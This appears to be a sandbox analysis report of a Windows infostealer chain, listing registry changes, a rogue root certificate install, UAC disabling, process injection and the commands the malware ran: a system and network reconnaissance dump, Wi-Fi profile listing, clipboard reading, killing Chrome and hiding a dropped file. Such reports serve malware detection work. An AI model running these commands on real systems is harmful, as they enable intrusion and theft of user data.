Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 6024b221ea3a6910a2dc08002b30309d6d0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Users\Admin\AppData\Local\Temp\7zS4BB5.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Users\Admin\AppData\Local\Temp\7zS4BB5.tmp\Install.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\AppData\Local\Temp\7zS4BB5.tmp\Install.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Users\Admin\AppData\Local\Temp\7zS4BB5.tmp\Install.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Users\Admin\AppData\Local\Temp\7zS4BB5.tmp\Install.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Users\Admin\AppData\Local\Temp\7zS4BB5.tmp\Install.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\223f7f1d9b4dfc44b2d2382cd1f834bab5beedfca3de0966dcee37761363f231.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\223f7f1d9b4dfc44b2d2382cd1f834bab5beedfca3de0966dcee37761363f231.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000022001\4.exe N/A
N/A N/A C:\Users\Admin\Pictures\xVAK0BkGsduUJI732B5D7eYQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\xVAK0BkGsduUJI732B5D7eYQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\xVAK0BkGsduUJI732B5D7eYQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\xVAK0BkGsduUJI732B5D7eYQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\xjnaD54mKqxWV7zAZ1hff5hG.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000022001\4.exe N/A
N/A N/A C:\Users\Admin\Pictures\xjnaD54mKqxWV7zAZ1hff5hG.exe N/A
N/A N/A C:\Users\Admin\Pictures\xjnaD54mKqxWV7zAZ1hff5hG.exe N/A
N/A N/A C:\Users\Admin\Pictures\xjnaD54mKqxWV7zAZ1hff5hG.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\1716969192_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1716969192_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1716969192_0\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1716969192_0\360TS_Setup.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\xVAK0BkGsduUJI732B5D7eYQ.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\xVAK0BkGsduUJI732B5D7eYQ.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\360TS_Setup.exe N/A
N/A N/A C:\Program Files (x86)\1716969192_0\360TS_Setup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4248 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\223f7f1d9b4dfc44b2d2382cd1f834bab5beedfca3de0966dcee37761363f231.exe C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
PID 4248 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\223f7f1d9b4dfc44b2d2382cd1f834bab5beedfca3de0966dcee37761363f231.exe C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
PID 4248 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\223f7f1d9b4dfc44b2d2382cd1f834bab5beedfca3de0966dcee37761363f231.exe C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
PID 4372 wrote to memory of 3908 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000002001\buildjudit.exe
PID 4372 wrote to memory of 3908 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000002001\buildjudit.exe
PID 3908 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\1000002001\buildjudit.exe C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe
PID 3908 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\1000002001\buildjudit.exe C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe
PID 2444 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe C:\Windows\system32\cmd.exe
PID 3728 wrote to memory of 3784 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3728 wrote to memory of 3784 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4612 wrote to memory of 2260 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 4612 wrote to memory of 2260 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 2444 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe C:\Windows\system32\cmd.exe
PID 1544 wrote to memory of 3604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1544 wrote to memory of 3604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2444 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe C:\Windows\system32\cmd.exe
PID 2756 wrote to memory of 2840 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2756 wrote to memory of 2840 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2444 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2444 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2444 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 3844 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 3844 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe C:\Windows\system32\cmd.exe
PID 3896 wrote to memory of 2760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ROUTE.EXE
PID 3896 wrote to memory of 2760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ROUTE.EXE
PID 3956 wrote to memory of 4660 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3956 wrote to memory of 4660 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3844 wrote to memory of 2268 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 3844 wrote to memory of 2268 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 3884 wrote to memory of 4144 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 3884 wrote to memory of 4144 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2444 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe C:\Windows\system32\cmd.exe
PID 1504 wrote to memory of 4116 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 1504 wrote to memory of 4116 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 4476 wrote to memory of 256 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4476 wrote to memory of 256 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4372 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4372 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4372 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2860 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2860 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2860 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2860 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2860 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2860 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2860 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2860 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 556 wrote to memory of 2280 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
PID 556 wrote to memory of 2280 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\223f7f1d9b4dfc44b2d2382cd1f834bab5beedfca3de0966dcee37761363f231.exe

"C:\Users\Admin\AppData\Local\Temp\223f7f1d9b4dfc44b2d2382cd1f834bab5beedfca3de0966dcee37761363f231.exe"

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"

C:\Users\Admin\AppData\Local\Temp\1000002001\buildjudit.exe

"C:\Users\Admin\AppData\Local\Temp\1000002001\buildjudit.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe

"C:\Users\Admin\AppData\Local\Temp\1000002001\buildjudit.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "chcp"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "chcp"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\chcp.com

chcp

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Get-Clipboard

C:\Windows\system32\chcp.com

chcp

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe

"C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"

C:\Users\Admin\AppData\Roaming\configurationValue\One.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"

C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe

"C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2860 -ip 2860

C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe

"C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2860 -s 272

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\system32\HOSTNAME.EXE

hostname

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get caption,description,providername

C:\Windows\system32\net.exe

net user

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user

C:\Windows\system32\query.exe

query user

C:\Windows\system32\quser.exe

"C:\Windows\system32\quser.exe"

C:\Windows\system32\net.exe

net localgroup

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup

C:\Windows\system32\net.exe

net localgroup administrators

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup administrators

C:\Windows\system32\net.exe

net user guest

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user guest

C:\Windows\system32\net.exe

net user administrator

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user administrator

C:\Windows\System32\Wbem\WMIC.exe

wmic startup get caption,command

C:\Windows\system32\tasklist.exe

tasklist /svc

C:\Windows\system32\ipconfig.exe

ipconfig /all

C:\Windows\system32\ROUTE.EXE

route print

C:\Windows\system32\ARP.EXE

arp -a

